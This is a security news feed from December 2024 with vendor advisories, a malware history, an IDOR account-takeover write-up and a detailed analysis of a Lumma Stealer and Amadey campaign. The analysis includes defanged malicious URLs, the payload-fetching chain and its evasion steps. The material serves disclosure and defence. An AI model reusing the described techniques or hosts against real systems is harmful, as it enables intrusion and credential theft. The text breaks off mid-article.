Critical Veeam Vulnerabilities Expose Service Provider Console to Cyber RisksVeeam has published a critical advisory regarding severe vulnerabilities affecting its Veeam Service Provider Console (VSPC), particularly impacting version 8.1.0.21377 and earlier builds from version 7. These Veeam vulnerabilities, identified as CVE-2024-42448 and CVE-2024-42449, expose service providers to online security risks. These vulnerabilities in Veeam are especially concerning due to their potential to compromise system integrity, data confidentiality, and network security. Overview of the Veeam Vulnerabilities The Veeam vulnerabilities, disclosed as part of Veeam’s December 2024 updates, have been classified with high severity levels, with CVE-2024-42448 rated as critical, and CVE-2024-42449 deemed high in severity. Both vulnerabilities exist due to flaws within the Veeam Service Provider Console 8.1 and affect all builds of version 8.1 and prior, including earlier builds from version 7. These vulnerabilities impact the management agent machines authorized on the VSPC server, which means that an attacker with control over a management agent could exploit these vulnerabilities to access or manipulate the server. CVE-2024-42448: Remote Code Execution (RCE) The first Veeam vulnerability, CVE-2024-42448, allows for Remote Code Execution (RCE). This occurs when an attacker gains access to a VSPC management agent machine that is authorized on the server. Once this condition is met, an attacker can execute arbitrary code remotely on the VSPC server machine. This critical flaw has been assigned a CVSS v3.1 score of 9.9—the highest possible severity rating—due to its potential to completely compromise a system. Internal testing discovered this flaw, highlighting the risk that it poses to organizations relying on the Veeam Service Provider Console for backup management. CVE-2024-42449: NTLM Hash Leak and File Deletion CVE-2024-42449 presents another serious security risk, allowing attackers to exploit the management agent machine to leak an NTLM hash of the VSPC server’s service account. Additionally, this vulnerability allows attackers to delete files on the VSPC server machine. Although not as severe as RCE, this flaw still represents a high risk, with a CVSS v3.1 score of 7.1. By gaining access to NTLM hashes, attackers could potentially escalate their privileges within the system, leading to further data breaches or malicious actions. Updates and Patches Veeam responded to the vulnerabilities by releasing a critical patch to mitigate these issues. Service providers using Veeam Service Provider Console version 8.1 are encouraged to update to the latest available build, 8.1.0.21999, which addresses both CVE-2024-42448 and CVE-2024-42449. It is important to note that no mitigations are available for these vulnerabilities besides upgrading to the patched version. Thus, users of affected versions are strongly urged to install the cumulative update as soon as possible. The critical update was published on December 3, 2024, with the patch applied in Veeam Service Provider Console 8.1.0.21999. Service providers using earlier versions (including builds from version 7) are advised to upgrade to the latest version to safeguard their systems. The Veeam Service Provider Console vulnerabilities impact version 8.1.0.21377 and all prior versions in the 8.x and 7.x series. However, Veeam notes that if private fixes were applied to any of these versions, the build number may exceed the general availability (GA) version. In such cases, any deployed build lower than the solution build number (8.1.0.21999) should be considered vulnerable. For Veeam users who have not yet updated their systems, this is a critical reminder to ensure they are operating on the most recent, secure version of the VSPC. Those who fail to act could leave their systems vulnerable to potential attacks that could lead to data loss or security breaches. Conclusion Organizations using Veeam Service Provider Console are strongly advised to upgrade to the latest available build, 8.1.0.21999, to protect themselves from the vulnerabilities CVE-2024-42448 and CVE-2024-42449. These vulnerabilities present serious risks, including the possibility of Remote Code Execution and NTLM hash leaks, which could lead to further data loss, system compromises, and escalating attacks. As with any security vulnerability, timely patching is the best defense against potential exploits. Service providers and users of the affected Veeam versions should not delay the update process.
by The Cyber Express
2024-12-05 11:48:25
Russia’s Secret Blizzard Hacked Rival Hackers’ Networks for EspionageIn an extraordinary case of cyber-espionage, the Russian state-sponsored group Secret Blizzard has been revealed to have hijacked the infrastructure of other hacking groups for its operations, with a recent campaign targeting the Pakistan-based espionage cluster Storm-0156 (also known as SideCopy, Transparent Tribe, or APT36). Secret Blizzard, identified by the U.S. Cybersecurity and Infrastructure Security … The post Russia’s Secret Blizzard Hacked Rival Hackers’ Networks for Espionage appeared first on CyberInsider.
by Cyber Insider
2024-12-05 11:36:52
SurePath AI Discover classifies AI use by intent and detects sensitive data violationsSurePath AI launched SurePath AI Discover, a new offering that provides visibility into a company’s employee use of public AI services. By classifying AI use by intent and identifying sensitive data violations, companies can better understand the volume, use case, and risk of AI use across their organization. “Our launch of the GenAI discovery program creates a first-in-industry solution for our launch partners,” said Jim Melton, VP of Alliance at SurePath AI. “We are excited … More → The post SurePath AI Discover classifies AI use by intent and detects sensitive data violations appeared first on Help Net Security.
by Help Net Security
2024-12-05 11:30:00
System Two Security Emerges From Stealth With Detection Engineering SolutionSystem Two Security has emerged from stealth mode with a threat detection engineering solution and $7 million in seed funding. The post System Two Security Emerges From Stealth With Detection Engineering Solution appeared first on SecurityWeek.
by SecurityWeek
2024-12-05 11:29:11
She Escaped an Abusive Marriage—Now She Helps Women Battle Cyber HarassmentInspired by her own experience of abuse, Nighat Dad fights for women’s social and digital rights in Pakistan and beyond.
by WIRED Security News
2024-12-05 11:20:30
Firebase URL Exploitation: Taking Over Android Databases Like a Pro!Free ReadContinue reading on InfoSec Write-ups »
by InfoSec Write-ups
2024-12-05 11:20:14
TryHackme’s Advent of Cyber 2024 — Day 04 WriteupDay 4: I’m all atomic inside!Continue reading on InfoSec Write-ups »
by InfoSec Write-ups
2024-12-05 11:19:32
How I Broke Into My Dev Friend’s Website in Less Than 24 HourYou know what they say about ‘bulletproof’ websites? They never are. My dev friend swore his site was unhackable.Continue reading on InfoSec Write-ups »
by InfoSec Write-ups
2024-12-05 11:18:38
The ‘I Love You’ That Broke the Internet: A Love Letter Turned Cyber NightmareLove-LetterWhat if a simple love letter could disrupt businesses, governments, and personal lives worldwide? In May 2000, a computer worm masquerading as affection did just that.Known as the “I Love You” virus, it combined social engineering with malicious code to become one of the most infamous and destructive cyberattacks in history. Beyond the billions of dollars in damages, the virus left an indelible mark on the world of cybersecurity. If you’re wondering how it all happened, let’s explore it together.CreditWhat Was the ‘I Love You’ Virus?Photo by Evan Dennis on UnsplashThe “I Love You” virus, often regarded as one of the most destructive computer viruses in history, was a computer worm disguised as an innocent text file. Delivered via email, the message bore the enticing subject line “I Love You” and included an attachment named “LOVE-LETTER-FOR-YOU.txt.vbs.”At first glance, the attachment appeared to be a harmless text file, but its “.vbs” extension revealed its true nature as a Visual Basic Script. Many users, unfamiliar with file extensions or scripting, unknowingly activated the malicious code by clicking on it. This attack became a classic case study of how social engineering in cybersecurity can manipulate human behavior to bypass technical defenses.When executed, the script unleashed a chain reaction of damage. It overwrote files, stole passwords, and sent copies of itself to all the contacts in the recipient’s email address book. This simple trick leveraged human curiosity and trust to create one of the fastest-spreading worms in history.The Scale of Its ImpactPhoto by James Toose on UnsplashThe “I Love You” virus caused widespread chaos, impacting organizations and individuals alike. High-profile victims included the Pentagon, the British Parliament, and media outlets like the BBC. Within the U.S. Army Forces Command alone, the virus infected over 2,258 workstations, leading to more than 12,000 hours of lost productivity and nearly $80,000 in recovery costs. Email systems were paralyzed, forcing many to revert to outdated communication methods like faxes and phone calls.Entire operations ground to a halt as organizations shut down email servers to contain the spread. The financial toll was immense, with damages globally exceeding $10 billion. These devastating effects are part of the reason why the “I Love You” virus remains one of the most memorable and studied incidents in the history of cybersecurity.The Mechanics of Its SpreadPhoto by Anton Maksimov 5642.su on UnsplashThe “I Love You” virus used a combination of social engineering and automation to spread rapidly across the globe. When a victim opened the attachment named “LOVE-LETTER-FOR-YOU.txt.vbs,” the malicious Visual Basic Script (VBS) was executed. The worm accessed the Microsoft Outlook address book, iterated through all contacts, and created new emails with the subject line “I Love You” and the same malicious attachment. This automated replication turned each infected system into a distribution hub, allowing the virus to propagate exponentially.The worm also infected the local system by targeting specific file types such as .jpg, .mp3, .css, .js, .vbs, and others. It replaced the contents of these files with its malicious script and, in some cases, created .vbs duplicates of files while deleting the original. For example, an image file named photo.jpg might be overwritten and saved as photo.jpg.vbs. This recursive behavior ensured that the infection spread further within the local environment.Additionally, the worm altered the Windows registry to add itself to the startup programs, ensuring persistence across system reboots. By combining email propagation, local file overwriting, and registry modifications, the “I Love You” virus achieved one of the fastest and most widespread infections in history, leaving millions of systems compromised.Challenges and Lessons LearnedPhoto by Daizy Isumi on UnsplashThe “I Love You” virus exposed significant gaps in cybersecurity preparedness and taught critical lessons that remain relevant today.At the time, organizations struggled to respond effectively. Antivirus software updates were not immediately available, delaying mitigation efforts. Email systems were taken offline entirely to prevent further spread, disrupting operations on a massive scale. For example, within the U.S. Army, email outages highlighted the need for alternative communication channels and improved incident response plans.This incident underscored the importance of proactive measures. Round-the-clock network monitoring, timely alerts, and robust backup systems could have minimized the impact. The virus also revealed the power of social engineering, showing that human curiosity and trust are often the weakest links in cybersecurity.Organizations learned the value of education, emphasizing the need for user awareness training to recognize phishing attempts and suspicious files. File filtering and attachment scanning became essential practices in email security protocols. Regular updates to software and systems were recognized as critical for reducing vulnerabilities.Ultimately, the “I Love You” virus served as a wake-up call, prompting a shift toward more resilient cybersecurity practices and coordinated responses to emerging threats. Its lessons remain vital for understanding how social engineering tactics continue to shape modern cybersecurity threats.The “I Love You” virus stands as a stark reminder of the risks posed by social engineering and unprepared digital infrastructures. Disguised as a love letter, it exploited human curiosity and outdated technology to spread rapidly, causing billions in damages and disrupting critical operations across the globe. Its impact on organizations like the Pentagon, British Parliament, and U.S. Army exposed vulnerabilities and highlighted the need for stronger defenses, better user education, and coordinated responses to cyber threats.By understanding the mechanics and fallout of the “I Love You” virus, we gain valuable insights into the evolution of cybersecurity and the importance of vigilance in a constantly changing digital landscape.Stay vigilant, stay informed, and stay secure!Thank You for Reading!Your interest and attention are greatly appreciated.References:https://github.com/onx/ILOVEYOU/tree/masterI Love You (virus) - Computer Museum of America %ILOVEYOU: the virus that loved everyonehttps://medium.com/media/56803dff59222de64a900f6d235aa74a/hrefhttps://medium.com/media/f870b40dfb63cf0b0b0785dab3eba253/hrefThe ‘I Love You’ That Broke the Internet: A Love Letter Turned Cyber Nightmare was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.
by InfoSec Write-ups
2024-12-05 11:18:07
The Story of How I Hacked an International University in IndonesiaMy friend suggested I sign up for a university to get a degree (such a thoughtful friend 🫡). He even sent me the registration link. Being my usual curious self, I decided to check out the website’s vulnerabilities.I used temp-mail.org to get a temporary email for the registration process. After signing up, I got a verification link to activate my account. Once activated and logged in to the system, I opened the network panel, started analyzing the website’s requests, and stumbled upon some interesting URLs.I copied the request as a cURL command, ran it, and got the response in JSON format.and if I change the request and set the ID to 37 I get this response(Looks like I found an IDOR vulnerability before GTA 6 dropped 🙂↔️).Turns out the website has an IDOR vulnerability that lets me access everyone’s data in the database. The best part? I can see their NIK (citizenship number), email, and even their password reset tokens which could easily lead to an account takeover. Alright, let me cook folks. 👨🍳I went back to the login page and navigated to the reset password page to request a new passwordAs we can see, the link contains the user token, which we can access, thanks to the previous IDOR vulnerability. So, I decided to create a new user account just to hack myself 👻.I requested a password reset and sent it to my other account. Then, I checked the user reset password token, replaced it with the token I grabbed earlier, and boom 💥 I successfully changed my other account’s password. This same trick could work on any account on the website.After this little experiment, I reported the issue to their IT team and shared suggestions on how they could prevent this kind of attack in the future. 🛠️What can we learn from this story?If you come across a website using a front-end framework, that’s a win, it makes it easier to analyze the APIs they’re sending.Find a friend who cares about your education ✌🏻; they might just send you a similar link 🥹And remember: never trust user input. Always validate and sanitize!Tools:https://curl.se/The Story of How I Hacked an International University in Indonesia was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.
by InfoSec Write-ups
2024-12-05 11:17:00
NCA Busts Russian Crypto Networks Laundering Funds and Evading SanctionsThe U.K. National Crime Agency (NCA) on Wednesday announced that it led an international investigation to disrupt Russian money laundering networks that were found to facilitate serious and organized crime across the U.K., the Middle East, Russia, and South America. The effort, codenamed Operation Destabilise, has resulted in the arrest of 84 suspects linked to two Russian-speaking networks
by The Hacker News
2024-12-05 11:07:57
Threat Actor Targets the Manufacturing industry with Lumma Stealer and Amadey BotKey takeaways Cyble Research and Intelligence Labs (CRIL) identified a malicious campaign targeting the manufacturing industry, leveraging a deceptive LNK file disguised as a PDF file. This campaign leverages multiple Living-off-the-Land Binaries (LOLBins), such as ssh.exe, powershell.exe, and mshta.exe, to bypass traditional security mechanisms and remotely execute the next-stage payload. The Threat Actor (TA) used Google Accelerated Mobile Pages (AMP) URL along with a shortened URL to evade detection by traditional URL scanners. The attack heavily relies on file injection techniques, where the TAs execute malicious payloads directly in memory to bypass conventional security mechanisms. The attack chain leverages DLL sideloading and IDATLoader to deploy the Lumma stealer and Amadey bot, enabling the attacker to gain control and exfiltrate sensitive information from the victim''s machine. Overview CRIL recently identified a multi-stage cyberattack campaign originating from an LNK file. The initial infection vector remains unknown; however, the attack likely begins with a spear-phishing email, prompting the recipient to click on a link that leads to an LNK shortcut file disguised as a PDF document. The file is hosted on a remote WebDAV share at ""hxxp://download-695-18112-001-webdav-logicaldoc[.]cdn-serveri4732-ns.shop/Downloads/18112.2022/Instruction_695-18121-002_Rev.PDF.lnk"". Upon searching for the file name “695-18121-002_Rev” on Google, we discovered a technical engineering drawing for a component. Additionally, we observed similar samples using the name “Instruction_18112,” which led us to another technical document detailing the installation of a chair. The malicious LNK file hosted on the URL impersonates LogicalDOC, a cloud-based document management system commonly used in Manufacturing and Engineering firms. Based on the targeting and nature of these attacks, we suspect that the campaign is likely targeting the manufacturing industry. Once executed, the LNK file triggers a command to launch ssh.exe, which subsequently runs a PowerShell command. This PowerShell command fetches and executes an additional malicious payload from a remote server using mshta.exe. The remote server is accessed via a URL that abuses Google’s Accelerated Mobile Pages (AMP) framework, combined with a shortened URL that redirects to a location hosting malicious PowerShell code. The PowerShell code then triggers another malicious script hosted on Pastebin, controlled by the TA. This script contains an encoded PowerShell command that downloads a ZIP archive to the Temp directory, extracts its contents, and executes a legitimate executable. The executable, in turn, sideloads a malicious DLL file. In this sophisticated campaign, the TA uses multiple stages of code injection to deploy the Lumma stealer, which then downloads the Amadey Bot onto the victim''s system. The figure below shows the infection chain. Figure 1 - Infection chain Technical Analysis Threat Actors are increasingly exploiting LNK files as their initial vector for malware distribution due to their flexibility in executing various commands. In this campaign, they specifically leveraged the Windows SSH client (C:\Windows\System32\OpenSSH\ssh.exe) as an alternative target in the LNK file’s “Target” field. This approach reduces the likelihood of detection compared to using cmd.exe or powershell.exe as the target. The image below shows the LNK command. Figure 2 - LNK using SSH as a target When a user opens the disguised LNK file, it triggers “ssh.exe” to run a PowerShell command through the ProxyCommand option in ssh.exe. The embedded PowerShell command contains obfuscated content, as shown in the image above. The de-obfuscated code attempts to execute PowerShell content hosted at the AMP URL ""hxxps://www.google[.]ca/amp/s/goo.su/IwPQJP"" using mshta.exe. In this case, the hosted content contains AES-encrypted data, as shown in the image below. Figure 3 - AES-encrypted content hosted in AMP URL Upon decryption, the data reveals Base64-encoded content, which is displayed in the image below. Figure 4 – Base64-encoded content The decoded Base64 content reveals an obfuscated PowerShell command, as shown in the image below. Figure 5 - Obfuscated PowerShell command This PowerShell command manipulates security protocols and performs the following actions: First, it configures various security protocols, including TLS 1.0, TLS 1.1, TLS 1.2, and SSL 3.0, using the .NET ServicePointManager class. Then, it initiates a web request using Invoke-WebRequest (iwr) to fetch a payload from the URL hxxps://Pastebin[.]com/raw/0v6Vhvpb, which is then immediately executed using Invoke-Expression (iex). The image below shows the retrieved payload from the Pastebin URL. Figure 6 - Partial PowerShell script fetched from the Pastebin URL The retrieved content from the Pastebin link consists of a PowerShell script that performs several actions: The script begins by sanitizing the content fetched from Pastebin, removing newline characters (""n"") and commas (,). The cleaned string is then decoded from Base64 into binary data. Using a hardcoded decryption key, the script decrypts the binary data. Once decrypted, the script extracts a portion of the data starting from the 64th byte to the end, which is the actual code to execute. This code is then converted into a readable PowerShell command using UTF-8 encoding. Before executing the decoded command, a 2-second delay is introduced with Start-Sleep. Finally, the decoded PowerShell command is executed in memory using Invoke-Expression. The image below shows the decrypted PowerShell code extracted using the above steps. Figure 7 - Decrypted PowerShell code The newly introduced script represents the final stage in delivering malicious files to the system. The script operates as follows: The script first verifies the system''s internet connectivity by sending HTTP requests to two distinct domains: 360.net and baidu.com. These requests ensure the system is online before proceeding with further actions. Once the victim’s system is connected to the internet, the script downloads a malicious CPL file named naailq0.cpl from the remote URL hxxps://berb.fitnessclub-filmfanatics.com/naailq0.cpl. The downloaded CPL file is saved as a ZIP file within the Temp directory. This ZIP file is then copied to a newly created folder under the LocalAppData folder. The folder name is dynamically generated using a GUID (Globally Unique Identifier). After extraction, the script scans the folder for any executable files (EXEs). Any EXE files found within the extracted contents are then executed. The script includes a commented-out line that, if activated, would delete the extracted files and folder after execution, potentially covering its tracks. The image below shows the contents of the downloaded ZIP file. The ZIP file also contains encrypted files, which will be decrypted and loaded in the subsequent stages of infection. Figure 8 - Extracted files in the archive In this case, the script executes “syncagentsrv.exe”, which performs DLL sideloading by loading the malicious “Qt5Network.dll” upon execution. The malicious DLL then reads an encrypted file named “shp” from the same directory, decrypts its contents, and reveals strings such as LoadLibraryA, VirtualProtect, and dbghelp.dll, as shown in the figure below. Figure 9 - Decrypted content After decryption, the malicious DLL extracts the string “dbghelp.dll” from the decrypted content and utilizes it to load the DLL via the LoadLibraryA API. The “dbghelp.dll” is a Microsoft Windows library designed for debugging and managing symbol information. After loading the DLL, the malicious code employs the VirtualProtect API to modify the memory region permissions of ""dbghelp.dll"" to PAGE_EXECUTE_READWRITE, as illustrated below. Figure 10 - Modifying permission of dbghelp.dll It then overwrites the contents of ""dbghelp.dll"" with the decrypted data and subsequently modifies the memory protection of the overwritten region to PAGE_EXECUTE_READ, as depicted below. Figure 11 - Modifying the permissions of dbghelp.dll After modifying the memory protection, the malicious code begins executing the injected content within ""dbghelp.dll"". The injected code then proceeds to read another file named ""bwvrwtn"", located in the same directory. The file ""bwvrwtn"" is an encrypted IDAT file containing multiple encrypted chunks, each prefixed with the string ""IDAT,"" as illustrated below. Figure 12 - IDAT marker The DLL now searches the strings IDAT, takes four bytes following IDAT, and performs a comparison with C6 A5 79 EA. If the comparison is successful, the DLL proceeds to copy all the data following IDAT into memory, decrypts it using the XOR key, and then decompresses the decrypted content using the RTLDecompressBuffer API, as shown below. Figure 13 - Decompressed data It then loads a legitimate ""pla.dll"" from the %syswow64% directory using the LoadLibraryW API. After loading, it changes the memory permissions of ""pla.dll"" to PAGE_EXECUTE_READWRITE, copies the decrypted content into its memory, changes the permissions to PAGE_EXECUTE_READ, and finally executes the injected code in the “pla.dll” as shown below. Figure 14 - Executing the injected code The code within ""pla.dll"" proceeds to inject malicious code into ""more.com"" and then executes it. The malicious code in ""more.com"" is responsible for deploying the final payload by injecting it into a newly created process, ""msiexec.exe."" The injected payload is Lumma Stealer – which is capable of stealing sensitive information from the victim’s machine. The figure below shows the memory string of ""msiexec.exe"" containing Lumma Stealer’s C2 details. Figure 15 - Msiexec Process memory strings Amadey Bot The TA behind this campaign also deploys the Amadey bot in the “%temp%” directory, employing the same technique of injecting code into ""more.com."" This injected code further injects the final Amadey bot payload into ""explorer.exe"". To achieve persistence, the malware creates a Task Scheduler entry named ""NodeJS Web Framework."" This task is configured to execute a copy of the Amadey bot stored in the %Appdata% directory, as illustrated below. Figure 16 - Task Scheduler for Persistence The figure below shows the execution flow of Lumma Stealer and Amadey bot. Figure 17 - Execution Flow Conclusion This multi-stage cyberattack campaign demonstrates the increasing sophistication and adaptability of threat actors. By leveraging various evasion techniques such as URL shortening and AMP URLs, the attackers successfully bypass traditional security mechanisms. The use of legitimate system tools like ssh.exe and mshta.exe to execute malicious PowerShell commands further illustrates the complexity of the attack. The final payload, which involves the deployment of both Lumma stealer and Amadey bot, highlights the TA''s intent to steal sensitive information and maintain persistent control over compromised systems. Yara and Sigma rules to detect this campaign, are available for download from the linked Github repository. Recommendations The initial breach may occur via spam emails. Therefore, it’s advisable to deploy strong email filtering systems to identify and prevent the dissemination of harmful attachments. Exercise caution when handling email attachments or links, particularly those from unknown senders. Verify the sender’s identity, particularly if an email seems suspicious. Disable WebDAV if it is not required for business operations to minimize potential attack vectors. Consider disabling the execution of shortcut files (.lnk) originating from remote locations, such as WebDAV links, or implementing policies that require explicit user consent before executing such files. The campaign abused the legitimate ssh utility; hence, it is advised to monitor the activities conducted by the ssh utility and restrict access to limited users. Consider limiting the execution of scripting languages, such as PowerShell and mshta.exe, on user workstations and servers if they are not essential. Implement application whitelisting to ensure only approved and trusted applications and DLLs can be executed on the systems. Monitor AMP links using advanced URL filtering and threat intelligence feeds to detect suspicious activity. Set up network-level monitoring to detect unusual activities or data exfiltration by malware. Block suspicious activities to prevent potential breaches. MITRE ATT&CK® Techniques Tactic Technique Procedure Initial Access (TA0001) Phishing (T1566) The LNK file may be delivered through phishing or spam emails Execution (TA0002) User Execution: Malicious Link (T1204.001) Command and Scripting Interpreter: PowerShell (T1059.001) Execution begins when a user executes the LNK file.The LNK file executes PowerShell commands. Defence Evasion (TA0005) Masquerading: Masquerade File Type (T1036.008) Uses LNK files with altered icons to disguise as legitimate Defense Evasion (TA0005) System Binary Proxy Execution: Mshta (T1218.005) Abuse mshta.exe to proxy execution of malicious files. Defense Evasion (TA0005) Obfuscated Files or Information (T1027) Scripts include packed or encrypted data. Defense Evasion (TA0005) System Binary Proxy Execution: Msiexec (T1218.007) msiexec.exe used for proxy execution of malicious payloads Privilege Escalation (TA0004) DLL Side-Loading (T1574.002) Malicious DLL Side loaded. Privilege Escalation (TA0004) Process Injection (T1055) Injects malicious content into explorer.exe and other process. Persistence (TA0002) Scheduled Task/Job (T1053.005) Adds task schedular entry for persistence. C&C (TA0011) Application Layer Protocol (T1071) Malware communicates to the C&C server. Exfiltration (TA0010) Automated Exfiltration (T1020) Data is exfiltrated after collection Indicators Of Compromise Indicators Indicator Type Description 5b6dc2ecb0f7f2e1ed759199822cb56f5b7bd993f3ef3dab0744c6746c952e36 SHA-256 Instruction_695-18121-002_Rev.PDF.lnk 8ed1af83cf70b363658165a339f45ae22d92c51841b06c568049d3636a04a2a8 SHA-256 Malicious PowerShell Script downloaded from Pastebin(0v6Vhvpb) 7b8958ed2fc491b8e43ffb239cdd757ec3d0db038a6d6291c0fd6eb2d977adc4 SHA-256 Zip file disguised as .cpl dc36a3d95d9a476d773b961b15b188aa3aae0e0a875bca8857fca18c691ec250 SHA-256 Malicious DLL (Sideloaded) hxxps://www.google[.]ca/amp/s/goo.su/IwPQJP hxxps://pastebin[.]com/raw/0v6Vhvpb hxxps://berb.fitnessclub-filmfanatics[.]com/naailq0.cpl URL remote servers hxxp://download-695-18112-001-webdav-logicaldoc[.]cdn-serveri4732-ns.shop/Downloads/18112.2022/ URL WebDAV server link hosting malicious LNK file References https://www.rapid7.com/blog/post/2023/08/31/fake-update-utilizes-new-idat-loader-to-execute-stealc-and-Lumma-infostealers https://www.rapid7.com/blog/post/2024/03/28/stories-from-the-soc-part-1-idat-loader-to-bruteratel The post Threat Actor Targets the Manufacturing industry with Lumma Stealer and Amadey Bot appeared first on Cyble.
by CYBLE
2024-12-05 11:04:45
Protecting the cloud: combating credential abuse and misconfigurationsTo defend again two of today’s biggest cloud security threats, organizations must adapt and develop proactive strategies, Google Cloud’s Brian Roddy writes.
by Cybersecurity Dive
2024-12-05 11:00:48
Russian programmer says FSB agents planted spyware on his Android phoneSecurity researchers confirmed the programmer''s phone had spyware, likely during a spell in Russian detention. The programmer told his story to TechCrunch. © 2024 TechCrunch. All rights reserved. For personal use only.
by TechCrunch
2024-12-05 11:00:00
White House Says at Least 8 US Telecom Firms, Dozens of Nations Impacted by China Hacking CampaignA top White House official said at least eight U.S. telecom firms and dozens of nations have been impacted by a Chinese hacking campaign. The post White House Says at Least 8 US Telecom Firms, Dozens of Nations Impacted by China Hacking Campaign appeared first on SecurityWeek.
by SecurityWeek
2024-12-05 10:56:19
Q&A with Jonathan Armstrong: An Inside Look at CREST AccreditationExplore the role of CREST accreditation in cybersecurity, its link to DORA, and insights from Jonathan Armstrong on its future in the security industry. The post Q&A with Jonathan Armstrong: An Inside Look at CREST Accreditation appeared first on NetSPI.
by NetSPI
2024-12-05 10:50:39
BT Investigating Hack After Ransomware Group Claims Theft of Sensitive DataUK telecoms company BT has launched an investigation after the Black Basta ransomware group claimed the theft of 500 Gb of data. The post BT Investigating Hack After Ransomware Group Claims Theft of Sensitive Data appeared first on SecurityWeek.
by SecurityWeek
2024-12-05 10:39:00
CISA Warns of Active Exploitation of Flaws in Zyxel, ProjectSend, and CyberPanelThe U.S. Cybersecurity and Infrastructure Security Agency (CISA) added multiple security flaws affecting products from Zyxel, North Grid Proself, ProjectSend, and CyberPanel to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation in the wild. The list of vulnerabilities is as follows - CVE-2024-51378 (CVSS score: 10.0) - An incorrect default permissions
by The Hacker News
2024-12-05 10:32:58
Download: The Ultimate Guide to the CCSPEven the brightest minds benefit from guidance on the journey to success. The Ultimate Guide to the CCSP covers everything you need to know about the world’s leading cloud security certification. Learn how CCSP – and ISC2 – can help you discover your certification path, create your plan and distinguish you as a top-level cybersecurity expert. It’s all inside: Is CCSP right for me? CCSPs in the community Benefits of CCSP certification Benefits of ISC2 … More → The post Download: The Ultimate Guide to the CCSP appeared first on Help Net Security.
by Help Net Security
2024-12-05 10:32:31
How to guard against webcam and microphone tracking | Kaspersky official blogDo you need to tape over your camera in 2024?
by Kaspersky
2024-12-05 10:03:00
Are you on the naughty or nice list for responsible AI adoption?
by ComputerWeekly
2024-12-05 10:02:12
Latrodectus malware and how to defend against it with WazuhLatrodectus is a versatile malware family that infiltrate systems, steal sensitive data, and evades detection. Learn more from Wazuh about Latrodectus malware and how to defend against it using the open-source XDR. [...]
by BleepingComputer
2024-12-05 10:00:52
Our secret ingredient for reverse engineeringKaspersky researchers demonstrate capabilities of hrtng plugin for IDA Pro, share tips on working with IDA and reverse engineer FinSpy malware with these tools.
by Securelist
2024-12-05 10:00:00
Harness the Cloud: Critical Benefits of Cloud ComputingUnlock the power of the cloud for your business. Explore advantages from resilience to cost savings, and trends shaping the cloud-dominant future.
by ITPro Today
2024-12-05 09:56:28
Keeper Introduces Risk Management Dashboard for Enhanced Risk Visibility and Proactive Threat MitigationKeeper Security have announced the launch of Risk Management Dashboard, a new feature within the Keeper Admin Console. The dashboard empowers administrators with broad visibility into their organisation’s security practices and compliance posture, setting a new standard for streamlined cybersecurity management. The Risk Management Dashboard provides an intuitive risk assessment score based on key metrics […] The post Keeper Introduces Risk Management Dashboard for Enhanced Risk Visibility and Proactive Threat Mitigation appeared first on IT Security Guru.
by IT Security Guru
2024-12-05 09:17:33
Russia-linked APT Secret Blizzard spotted using infrastructure of other threat actorsRussia-linked APT group Secret Blizzard has used the tools and infrastructure of at least 6 other threat actors during the past 7 years. Researchers from Microsoft Threat Intelligence collected evidence that the Russia-linked ATP group Secret Blizzard (aka Turla, Snake, Uroburos, Waterbug, Venomous Bear and KRYPTON) has used the tools and infrastructure of at least 6 other threat actors during the […]
by Security Affairs
2024-12-05 09:03:00
T-Mobile undeterred as telecom sector reels from attack campaignCybersecurity Dive spoke with CSO Jeff Simon about how the carrier says it thwarted a threat group resembling Salt Typhoon despite its past security failures.
by Cybersecurity Dive
2024-12-05 09:00:00
Making Zero Trust Architecture AchievableHow NIST is working with Tenable and other private sector stakeholders to better enable zero trust implementation.Trust no one. Verify everything. All the time. When it comes to cybersecurity and protecting your expanding attack surface, that’s more than a catchphrase. It’s the way you must approach access to your network, systems and assets. Ultimately, this is an approach the federal government must use, expand upon and intertwine into its cybersecurity standards.When thinking about zero trust, it’s important to understand this is an evolving practice that goes beyond traditional “trust but verify” approaches to cybersecurity. According to a Tenable blog by John Kindervag, who created the Zero Trust Model of Cybersecurity when he was a principal analyst at Forrester Research, “While the zero trust model represents a significant divergence from the legacy, moat-and-castle approach to network security, it can be implemented by practitioners using commercial off-the-shelf technology. And it''s built upon current cyber best practices and sound cyber hygiene, such as vulnerability management, proactive patching and continuous monitoring, already implemented in most organizations today.”It’s time to rethink the trust-but-verify model of cybersecurityThe principles of zero trust require rethinking the trust-but-verify model upon which so much IT infrastructure has been built. It calls for viewing trust as a vulnerability instead and calls for removing the notion of trust from digital systems.Zero trust is a proactive cybersecurity approach. However, with anything proactive, it’s important to remember there is a constant need for adaptation and new protocols that can withstand the changing threat landscape.On Dec. 4, NIST released the draft Guidance for Implementing Zero Trust Architecture for public comment. Tenable has been proud to work alongside the NIST National Cybersecurity Center of Excellence (NCCoE) to launch the Zero Trust Architecture Demonstration Project. This collaborative project has brought together multiple industry participants to launch end-to-end zero trust architecture implementations to help industry and government reduce the risk of cyberattacks. As part of this collaborative project, Tenable has participated in a lab demonstration of how to deploy examples of zero trust architecture in hybrid enterprise environments using commercially available technology contributions.“The [...] demonstration project, ''Implementing a Zero Trust Architecture,'' stands as a critical cybersecurity initiative that showcases the resilience of ZTAs across multiple practical implementations.”—Alper Kerman, Security Engineer and Principal Lead of the NCCoE Zero Trust Project at NIST“The NCCoE ZTA demonstration project, ''Implementing a Zero Trust Architecture,'' stands as a critical cybersecurity initiative that showcases the resilience of ZTAs across multiple practical implementations,” explained Alper Kerman, Security Engineer and Principal Lead of the NCCoE Zero Trust Project at NIST. “Each implementation combines a strategic mix of commercially available products and services, contributed by partner organizations such as Tenable. Their invaluable role in providing enhanced visibility and insights has been essential in strengthening our defenses, ensuring we can safeguard our networks against the ever-evolving landscape of cyberthreats.”As a main collaborator, Tenable contributed exposure management technology and capabilities for the ZTA Demonstration Protect. As a leader in cybersecurity, Tenable was able to harness its expertise to best use security analytics, building out a program that had orchestration and enforcement capabilities through scanning and assessment, endpoint monitoring, traffic inspection and network discovery.When implementing a zero trust architecture, it is a foundational imperative for organizations and enterprises to inventory, enumerate and assess every asset on the network. This allows for a better understanding of assets in context and how they are interconnected. Analyzing data from operational technology (OT), internet of things (IoT), IT, cloud and network plays a critical role in helping organizations gain visibility into how assets are interconnected, evaluate exposure based on real-world threats and context, and prioritize remediation and mitigation efforts. Ultimately, it’s important for an organization to completely understand the entire attack surface in order to evaluate which assets are most vulnerable. Zero trust architecture is a way to programmatically collect risk telemetry and make informed decisions that 